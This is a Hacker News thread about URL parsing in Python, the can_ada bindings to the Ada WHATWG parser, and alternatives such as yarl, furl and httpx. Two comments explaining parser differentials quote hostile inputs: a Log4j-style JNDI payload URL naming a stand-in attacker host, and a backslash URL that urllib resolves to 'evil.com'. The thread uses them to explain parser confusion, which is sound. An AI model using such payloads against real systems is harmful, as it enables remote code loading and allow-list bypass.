[HN Gopher] Parsing URLs in Python
       ___________________________________________________________________
        
       Parsing URLs in Python
        
       Author : ibobev
       Score  : 158 points
       Date   : 2024-03-16 16:53 UTC (1 day ago)
        
 (HTM) web link (tkte.ch)
 (TXT) w3m dump (tkte.ch)
        
       | memco wrote:
        | This is intriguing to me for the performance and correctness
        | reasons, but also if it makes the result more dev-friendly than
        | the urllib.parse tuple-ish-object result thing.
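        | 
        | For reference, the stdlib result really is a (named) 6-tuple:
        | 
        |     >>> from urllib.parse import urlparse
        |     >>> r = urlparse("https://example.com/a?b=1#c")
        |     >>> r[1], r.netloc   # indexable like any other tuple
        |     ('example.com', 'example.com')
        |     >>> len(r)           # always exactly six fields
        |     6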
        
         | nerdponx wrote:
         | I posted this elsewhere in the thread, but there absolutely is
         | prior art here. Check out Yarl (urllib.parse wrapper with the
         | nicer interface) and Hyperlink (green field, immutable OO
         | style, focus on correctness). Both on PyPI for many years now.
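          | 
          | A rough sketch of the yarl style (from memory, so check its
          | docs for the exact names):
          | 
          |     from yarl import URL
          | 
          |     url = URL("https://example.com/search?q=python")
          |     print(url.host)        # 'example.com'
          |     print(url.path)        # '/search'
          |     print(url.query["q"])  # 'python'
          |     # immutable: building a variant returns a new URL
          |     print(url.with_host("example.org"))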
        
           | memco wrote:
           | Thanks! I have come across yarl, but not hyperlink.
        
         | diarrhea wrote:
         | Yeah, that tuple API is bizarre. It really doesn't play well
         | with type annotations either.
        
       | Areading314 wrote:
        | Hard to imagine the tradeoff of using a third-party binary
        | library developed this year vs just using urllib.parse being
        | worth it. Is this solving a real problem?
        
         | pyuser583 wrote:
          | urllib.parse is a pain. We really need something more like
          | pathlib.Path.
        
           | masklinn wrote:
           | That used to be werkzeug.urls, kinda (it certainly had a more
           | convenient API than urllib.parse), but it was killed in
           | Werkzeug 3.
        
             | pyuser583 wrote:
             | I remember and miss that. But I'm not going to install
             | werkzeug just for the url parsing.
        
               | d_kahneman7 wrote:
               | Is it that inconvenient?
        
           | Ch00k wrote:
           | There is https://github.com/gruns/furl
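            | 
            | If I remember its README correctly, usage looks roughly
            | like:
            | 
            |     from furl import furl
            | 
            |     f = furl("http://www.google.com/?one=1")
            |     f.args["two"] = "2"  # mutable query parameters
            |     print(f.url)  # 'http://www.google.com/?one=1&two=2'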
        
             | AMCMneCy wrote:
             | Also https://github.com/aio-libs/yarl
        
               | 4ec0755f5522 wrote:
                | I use yarl as my default for this as well; it's been
                | great to work with.
        
             | pyuser583 wrote:
             | Yes! That's the one I like!
        
             | VagabundoP wrote:
             | This library is very pythonic.
        
           | joouha wrote:
           | You might be interested in
           | https://github.com/fsspec/universal_pathlib
        
         | masklinn wrote:
          | According to itself, it's solving the issue of parser
          | differential vulnerabilities: urllib.parse is ad-hoc and
          | pretty crummy, and the headliner function "urlparse" is
          | literally the one you should not use under any circumstances:
          | it follows RFC 1808 (maybe, anyway), which was deprecated by
          | RFC 2396 _25 years ago_.
         | 
         | The odds that any other parser uses the same broken semantics
         | are basically nil.
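          | 
          | A concrete example of such a differential (the stdlib side is
          | easy to check; the other side is what the WHATWG spec and
          | every browser do):
          | 
          |     from urllib.parse import urlsplit
          | 
          |     # urllib doesn't treat backslash as a delimiter, so the
          |     # hostname is whatever follows the last '@':
          |     print(urlsplit("https://example.com\\@evil.com/").hostname)
          |     # -> 'evil.com'
          |     # A WHATWG parser treats '\' like '/' here and sees the
          |     # host 'example.com' with path '/@evil.com/' instead.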
        
           | Areading314 wrote:
           | It seems unlikely that this C++ library written by a solo dev
           | is somehow more secure than the Python standard library would
           | be for such a security-sensitive task.
        
             | masklinn wrote:
             | Not in the sense of differential vulnerabilities, since the
             | standard library _refuses_ to match any sort of modern
             | standard.
             | 
             | It's also
             | 
             | 1. not a solo dev
             | 
             | 2. Daniel Lemire
             | 
             | 3. a serious engineering _and_ research effort:
             | https://arxiv.org/pdf/2311.10533.pdf
        
               | Areading314 wrote:
               | This is the commit history:
               | https://github.com/TkTech/can_ada/commits/main/
               | 
               | I guess you are right that there are 2 commits from a
               | different dev, so it is technically not a solo project. I
               | still wouldn't ever use this in production code.
        
               | bqmjjx0kac wrote:
               | The can_ada repo threw me off, too. It looks super
               | amateurish because of the lack of tests, fuzzers, etc.
               | 
               | But it appears that they've just exported the meat of the
               | Ada project and left everything else upstream.
        
               | masklinn wrote:
               | ...
               | 
               | can_ada is just the python bindings.
               | 
               | The actual underlying project is at
               | https://github.com/ada-url/ada
        
             | TkTech wrote:
             | Hi, can_ada (but not ada!) dev here. Ada is over 20k lines
             | of well-tested and fuzzed source by 25+ developers, along
             | with an accompanying research paper. It is the parser used
             | in node.js and parses billions of URLs a day.
             | 
              | can_ada is simply 60 lines of glue and packaging, making
              | it available to Python with low overhead.
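              | 
              | Off the top of my head (check the README for the exact
              | property names), usage is just:
              | 
              |     import can_ada
              | 
              |     url = can_ada.parse("https://example.com\\@evil.com/")
              |     print(url.host)  # WHATWG behaviour: 'example.com'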
        
               | Areading314 wrote:
               | Ah, that makes more sense -- it might be a good idea to
               | integrate with the upstream library as a submodule rather
               | than lifting the actual .cpp/.h files into the bindings
               | repo. That way people know the upstream C++ code is from
               | a much more active project.
               | 
               | Despite my snarky comments, thank you for contributing to
               | the python ecosystem, this does seem like a cool project
               | for high performance URL parsing!
        
           | woodruffw wrote:
           | I agree that the stdlib parser is a mess, but as an
           | observation: replacing one use of it with a (better!)
           | implementation _introduces_ a potential parser differential
           | where one didn't exist before. I've seen this issue crop up
           | multiple times in real Python codebases, where a well-
           | intentioned developer adds a differential by incrementally
           | replacing the old, bad implementation.
           | 
           | That's the perverse nature of "wrong but ubiquitous" parsers:
            | unless you're confident that your replacement is _complete_,
           | you can make the situation worse, not better.
        
             | Spivak wrote:
             | > unless you're confident that your replacement is complete
             | 
             | And that any 3rd party libs you use also don't ever call
             | the stdlib parser internally because you do not want to
             | debug why a URL works through some code paths but not
             | others.
             | 
             | Turns out that url parsing is a cross-cutting concern like
             | logging where libs should defer to the calling code's
             | implementation but the Python devs couldn't have known that
             | when this module was written.
        
         | yagiznizipli wrote:
          | Ada was developed at the end of 2022 and has been included in
          | Node.js since March 2023. Since then, Ada has powered Node.js,
          | Cloudflare Workers, Redpanda, ClickHouse and many more
          | libraries.
        
       | pyuser583 wrote:
       | The Ada programming language is cursed with overlapping acronyms.
       | GPS, ADA, SPARK, AWS. Seems it just got a little bit worse.
        
         | Solvency wrote:
         | It is _mindboggling_ to me how often developers create project
         | names without even _trying_ to search for precedent names _in
          | their own domain/industry_.
         | 
         | Calling this Ada is just ridiculous.
        
           | pyuser583 wrote:
           | Ada needs to fight back. Java templating library! Python
           | dependency resolver! Zag image manipulation library! SQL
           | event logging persistence framework!
           | 
           | I can't believe Amazon wasn't violating some anti-competition
           | rule by using "AWS" for "Amazon Web Services" when it already
           | meant "Ada Web Server."
           | 
            | Wow, when I search for "Ada GPS" I get global positioning
            | system support libraries before GNAT Programming Studio.
        
           | gjvc wrote:
           | yes but they think it's punny/funny/clever
        
             | nine_k wrote:
             | It's usually a poor reason. Calling the GNU Image
             | Manipulation Program "GIMP" was kinda funny and punny, and
             | maybe humble, but not wise.
             | 
              | Inkscape and Krita have less poignant but more reasonable
              | names. (But yes, such an approach removes some of the
              | teenage fun from doing a project.)
        
           | yagiznizipli wrote:
           | Ada developer here. Ada URL parser is named after my daughter
           | Ada. We chose this name in particular as a reference to Ada
           | Lovelace.
        
             | Hendrikto wrote:
             | > We chose this name in particular as a reference to Ada
             | Lovelace.
             | 
             | Just like the ~20 other projects named Ada.
        
         | masklinn wrote:
         | > Ada is a WHATWG-compliant and fast URL parser written in
         | modern C++
         | 
         | Why would you do that, Daniel?
        
           | TkTech wrote:
           | Hah :) It's named after Yagiz Nizipli's (Ada dev) newborn
           | daughter, Ada.
        
           | yagiznizipli wrote:
           | Ada developer here, Ada is the name of my daughter, and this
           | project is my gift to her, to remember me.
        
             | pyuser583 wrote:
              | Congrats on having a daughter! I hope one day she'll need
              | to parse a URL, and be able to see your love for her in
              | her code!
        
         | EmilStenstrom wrote:
          | At least can_ada (canada!) makes it a little bit more unique.
        
       | ulrischa wrote:
        | Parsing a URL is really a pain in the a*
        
         | SloopJon wrote:
         | Another post in this thread was downvoted and flagged (really?)
         | for claiming that URL parsing isn't difficult. The linked
          | article claims that "Parsing URLs _correctly_ is surprisingly
          | hard." As a software tester, I'm very willing to believe that,
         | but I don't know that the article really made the case.
         | 
         | I did find a paper describing some vulnerabilities in popular
         | URL parsing libraries, including urllib and urllib3. Blog post
         | here:
         | 
         | https://claroty.com/team82/research/exploiting-url-parsing-c...
         | 
         | Paper here:
         | 
         | https://web-assets.claroty.com/exploiting-url-parsing-confus...
         | 
          | If you remember the Log4j vulnerability from a couple of
          | years ago, that was a URL parsing bug.
        
           | masklinn wrote:
           | > If you remember the Log4j vulnerability from a couple of
           | years ago, that was an URL parsing bug.
           | 
           | I don't think that's a fair description of the issue.
           | 
           | The log4j vulnerability was that it specifically added JNDI
           | support (https://issues.apache.org/jira/browse/LOG4J2-313) to
           | property substitution (https://logging.apache.org/log4j/2.x/m
           | anual/configuration.ht...), which it would apply on logged
           | messages. So it was a pretty literal feature of log4j. log4j
           | would just pass the URL to JNDI for resolution, and
           | substitute the result.
        
             | SloopJon wrote:
             | I didn't look into this in detail at the time, but the
             | report's summary of CVE-2021-45046 is that the parser that
              | validated a URL behaved differently than a separate parser
              | used to fetch the URL, so a URL like
             | jndi:ldap://127.0.0.1#.evilhost.com:1389/a
             | 
             | is validated as 127.0.0.1, which may be whitelisted, but
             | fetched from evilhost.com, which probably isn't.
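              | 
              | You can reproduce the split-brain in a few lines; the
              | naive fetcher below is just a stand-in for what the JNDI
              | resolver effectively did:
              | 
              |     from urllib.parse import urlsplit
              | 
              |     url = "ldap://127.0.0.1#.evilhost.com:1389/a"
              |     # A fragment-aware validator sees only loopback:
              |     print(urlsplit(url).hostname)  # -> '127.0.0.1'
              |     # A fetcher that splits host:port on the last ':':
              |     authority = url.split("://", 1)[1].split("/", 1)[0]
              |     print(authority.rsplit(":", 1)[0])
              |     # -> '127.0.0.1#.evilhost.com'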
        
       | bqmjjx0kac wrote:
       | Writing a new parser in C++ is a mistake IMO. At the very least,
       | you need to write a fuzzer. At best, you should be using one of
       | the many memory safe languages available to you.
       | 
       | I retract my criticism if this project is just for fun.
       | 
       | Edit: downvoters, do you disagree?
       | 
        | Edit2: OK, I may have judged a bit prematurely. _Ada_ itself has
        | fuzzers and tests. They're just not exported to the _can_ada_
        | project.
        
         | yagiznizipli wrote:
          | Ada developer here. Ada has more than 5,000 tests, is included
          | in the OSS-Fuzz project, and is battle-tested in Node.js and
          | Cloudflare Workers.
        
           | bqmjjx0kac wrote:
           | I apologize for the misjudgment. I just followed the link to
           | can_ada and saw really minimal tests, e.g. https://github.com
           | /TkTech/can_ada/blob/main/tests/test_parsi...
           | 
           | I didn't understand that can_ada is not where the parser is
           | developed.
        
       | VagabundoP wrote:
        | Okay, so some googling told me that "xn--" means the rest of
        | the hostname is Unicode-encoded, but why does é become -fsa in
        | www.xn--googl-fsa.com?
        | 
        | Google failed me on the second part.
        
         | whalesalad wrote:
          | It's called an IDN. This is an encoding format called
          | Punycode that transforms international domains into ASCII.
        
         | js2 wrote:
         | Because that's the Punycode representation:
         | 
         | https://en.wikipedia.org/wiki/Punycode
         | 
         | https://www.punycoder.com/
        
           | andy99 wrote:
           | I wasn't aware of this, I'd seen those URLs before but only
           | in the context of Chinese ones and thought it was Chinese-
           | specific.
           | 
            | It's interesting because I just went down an apparent rabbit
            | hole implementing byte-level encoding for using language
            | models with Unicode. There, each byte in a Unicode character
            | is mapped to a printable character in a range around 255 <
            | ord(x) < 511 (I don't remember the highest, but the point is
            | that each byte is mapped to another printable Unicode
            | character).
           | 
           | See https://github.com/openai/gpt-2/blob/9b63575ef42771a01506
           | 0c9...
           | 
           | And the actual list of characters:
           | 
           | https://github.com/rbitr/llm.f90/blob/dev/phi2/phi2/pretoken.
           | ..
        
         | ekimekim wrote:
          | To expand on the sibling comments: this encoding (called
          | Punycode) works by combining the character to encode (é) and
          | the position it should be inserted at into a single number.
          | é is code point 233; subtract the initial offset 128, multiply
          | by the number of possible insertion positions (6, one more
          | than the 5 ASCII characters of "googl"), and add the insertion
          | position 5 (0-indexed): (233 - 128) * 6 + 5 = 635. This is
          | then encoded via a fairly complex variable-length scheme into
          | the letters "fsa".
         | 
         | See https://en.wikipedia.org/wiki/Punycode#Encoding_the_non-
         | ASCI...
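          | 
          | Python's stdlib codecs can show both layers of this:
          | 
          |     print("googlé".encode("punycode"))     # b'googl-fsa'
          |     print("googlé.com".encode("idna"))     # b'xn--googl-fsa.com'
          |     print(b"googl-fsa".decode("punycode")) # 'googlé'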
        
         | pixelesque wrote:
          | In case anyone else is confused as to why the domain in the
          | example provided needs to be Unicode (compared to the
          | filename, which is obvious): it's because the hyphen is the
          | shorter '‑' char, which is extended ASCII 226, not the
          | standard '-' (which would be ASCII 45).
        
           | ezequiel-garzon wrote:
            | The first character you pasted is U+2011 (8209 in decimal);
            | it does not appear in the document, and it cannot be ASCII,
            | as it is beyond code point 127/0x7F. Also, U+2011 is meant
            | to be a non-breaking hyphen.
        
         | ks2048 wrote:
         | This system seems pretty weird to me.
         | 
         | I was wondering, can that clash with a "normal" domain
         | registered as "xn--....."? Apparently there is another specific
         | rule in RFC 5891 saying "The Unicode string MUST NOT contain
         | "--" (two consecutive hyphens) in the third and fourth
         | character positions" [0]
         | 
         | Also, if I was forced to represent Unicode as ASCII, punycode
         | encoding is not the obvious one - it's pretty confusing. But, I
         | don't know much about how and why it was chosen, so I assume
         | there's good reason.
         | 
         | [0]
         | https://datatracker.ietf.org/doc/html/rfc5891#section-4.2.3....
        
           | lathiat wrote:
            | I mean, yeah, but the odds of someone using "xn--" at the
            | start of a domain are pretty small. The double dash is
            | pretty uncommon.
        
           | xg15 wrote:
           | IDNs and Punycode were basically bolted-on extensions to DNS
           | that were added after DNS was already widely deployed.
           | Because there was no "proper" extension mechanism available,
           | it was a design requirement that they can be implemented "on
           | top" of the standard DNS without having to change any of the
            | underlying components. So I think most of the DNS
            | infrastructure can be (and is) still completely unaware that
            | IDNs and Punycode exist.
           | 
           | Actually, I wonder what happens if you take a "normal" (i.e.
            | non-IDN, ASCII-only) domain and encode it as Punycode. Should
           | the encoded and non-encoded domains be considered identical
           | or separate? (for purposes of DNS resolutions, origin
           | separation, etc)
           | 
            | Identical would be more intuitive and would match the
            | behavior of domain names with non-ASCII characters; on the
            | other hand, this would require reworking ALL non-Punycode-
            | aware DNS software, which I doubt is possible.
           | 
           | So this seems like a tricky thing to get right.
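            | 
            | At the Punycode level, at least, the two forms stay
            | distinct; a quick stdlib check:
            | 
            |     # Encoding a pure-ASCII label still changes it (a
            |     # trailing delimiter is appended):
            |     print("example".encode("punycode"))  # b'example-'
            |     # So "example" and "xn--example-" would be different
            |     # DNS labels, which is presumably part of why RFC 5891
            |     # forbids registering such strings.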
        
         | Zambyte wrote:
         | Regarding the quality of Google search results - I copied this
         | comment verbatim into GPT 3.5, Claude 1, and Mistral small (the
         | lowest quality LLMs from each provider available through Kagi)
         | and each one explained Punycode encoding.
        
         | atorodius wrote:
          | FWIW I find this is the perfect question for ChatGPT/Gemini.
          | Whenever the knowledge is somewhere on the web but hard to
          | Google, I use these LLMs.
         | 
         | In this case, Gemini correctly points to Punycode
        
       | bormaj wrote:
        | Why not just use `httpx`? If you're not bound to the stdlib,
        | it's a great alternative to `requests` and urllib's URL
        | parsing.
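        | 
        | If I recall the httpx API correctly, it looks something like:
        | 
        |     import httpx
        | 
        |     url = httpx.URL("https://example.com/search?q=python")
        |     print(url.host)    # 'example.com'
        |     print(url.params)  # QueryParams('q=python')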
        
         | kmike84 wrote:
          | The URL parsing in httpx follows RFC 3986, which is not the
          | same as the WHATWG URL Living Standard.
          | 
          | RFC 3986 may reject URLs which browsers accept, or it may
          | handle them in a different way. The WHATWG URL Living Standard
          | tries to put on paper the real browser behavior, so it's a
          | much better standard if you need to parse URLs extracted from
          | real-world web pages.
        
         | gjvc wrote:
         | httpx is great, and "needs to be in base"
        
           | orf wrote:
           | No it doesn't, absolutely not. It's ironic that you say this
           | after the post you're commenting on spells out quite
           | explicitly why things "in base" are hard to change and adapt.
        
             | gjvc wrote:
             | where do you draw the line with this approach?
        
       | ojbyrne wrote:
        | Looking at the GitHub repo for can_ada, I discovered that the
        | developers live in Montreal, Canada. Nice one.
        
         | TkTech wrote:
         | I do! :) I should probably also never be allowed to name
         | things.
        
       | kmike84 wrote:
       | A great initiative!
       | 
        | We need a better URL parser in Scrapy, for similar reasons.
        | Speed and WHATWG standard compliance (i.e. doing the same as
        | web browsers) are the main things.
       | 
       | It's possible to get closer to WHATWG behavior by using urllib
       | and some hacks. This is what https://github.com/scrapy/w3lib
       | does, which Scrapy currently uses. But it's still not quite
       | compliant.
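        | 
        | In use, the w3lib shim looks roughly like this (from memory):
        | 
        |     from w3lib.url import safe_url_string
        | 
        |     # IDNA-encodes the host and percent-encodes the rest,
        |     # approximating what a browser would actually send:
        |     print(safe_url_string("https://exämple.com/pâth?q=dé"))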
       | 
        | Also, surprisingly, on some crawls URL parsing can consume CPU
        | time comparable to HTML parsing.
       | 
       | Ada / can_ada look very promising!
        
         | TkTech wrote:
         | can_ada dev here. Scrapy is a fantastic project, we used it
         | extensively at 360pi (now Numerator), making trillions of
         | requests. Let me know if I can help :)
        
       | JulianWasTaken wrote:
       | Nice.
       | 
        | I'll also throw in that I recently wrote bindings to Mozilla's
        | Servo URL library.
       | 
       | Those live at https://github.com/crate-py/url
       | 
       | They're not complete yet (meaning only the parsing bits are
       | exposed, not URL modification) but I too was frustrated with the
       | state of URL parsing.
        
         | timhh wrote:
         | IMO that URL crate is not especially high quality. I barely
         | work with URLs and I quickly found an embarrassingly trivial
         | bug:
         | 
         | https://github.com/servo/rust-url/issues/864#issuecomment-16...
        
       | phyzome wrote:
       | Honestly to hell with the WHATWG's weird pseudo-standard.
       | Backslashes? Five forward slashes? _No one_ is sending those URLs
       | around, and if they are, they should fix it. The only thing that
        | needs to deal with that kind of malformed URL is the browser's
       | address bar. If browsers want to do fixups on broken URLs at that
       | point, they should feel free to, but it shouldn't pollute an
       | entire spec.
       | 
       | (It's not even a real standard -- it's a "living standard", which
       | means it just changes randomly and there's no way to actually say
       | "yes, you're compliant with that".)
        
         | domenicd wrote:
         | It's always been extremely funny to me how arguments like this
         | and from the curl author go. "Yes, I had to change curl away
         | from strictly accepting two slashes, for web compatibility. But
         | `while(slash) { advance_parser() }`? That's completely
         | unreasonable! `while(slash && ++i <= 3)` is so much better, and
         | works almost as well!" Ok, whatever...
         | 
         | As for your claim about living standards, I'd encourage you to
         | read https://whatwg.org/faq#living-standard
        
       | nerdponx wrote:
       | No mention of prior art? The Hyperlink library has stated
       | correctness as its goal for a long time:
       | https://pypi.org/project/hyperlink
       | 
       | Of course there is always room for new projects, but it still
       | feels weird to act as if this is the first time anybody has ever
       | tried this. It seems like a lot of people are under this same
       | mistaken impression, at least according to the sample of HN users
       | who commented in this thread.
        
         | TkTech wrote:
          | Hyperlink (which I didn't know existed, by the way) is not a
          | parser for the WHATWG spec; it targets RFC 3986. You seem to
          | be getting things confused.
        
           | nerdponx wrote:
            | The article makes it sound like the only parser for URLs in
           | the entire Python ecosystem is urllib.parse, regardless of
           | which spec it supports. Hyperlink and Yarl are absolutely
           | prior art here IMO, and at least deserve a mention in an
           | article like this.
        
       | abstractbslayer wrote:
        | Pretty URLs are the most unnecessary thing ever invented; they
        | don't provide anything that non-pretty URLs can't, and millions
        | of parsers have to process them on every request. What a waste.
        
         | edflsafoiewq wrote:
         | What is a "pretty url"?
        
           | d0mine wrote:
           | There are people who are not native English speakers. They
           | might find Unicode useful.
        
       | d0mine wrote:
        | stdlib behavior may be preferable:
        | 
        | - resolving "../" may have security implications (example
        |   below)
        | 
        | - a Unicode hostname seems more readable. To get punycode, one
        |   can call .encode("idna") if necessary.
        | 
        | How often is parsing URLs a performance bottleneck?
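        | 
        | On "../", for example:
        | 
        |     from urllib.parse import urlsplit
        | 
        |     print(urlsplit("https://example.com/a/../etc/x").path)
        |     # -> '/a/../etc/x': the stdlib keeps the dot segments,
        |     # so a path check can still spot the traversal attempt.
        |     # A WHATWG parser collapses them at parse time, yielding
        |     # '/etc/x'.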
        
       ___________________________________________________________________
       (page generated 2024-03-17 23:02 UTC)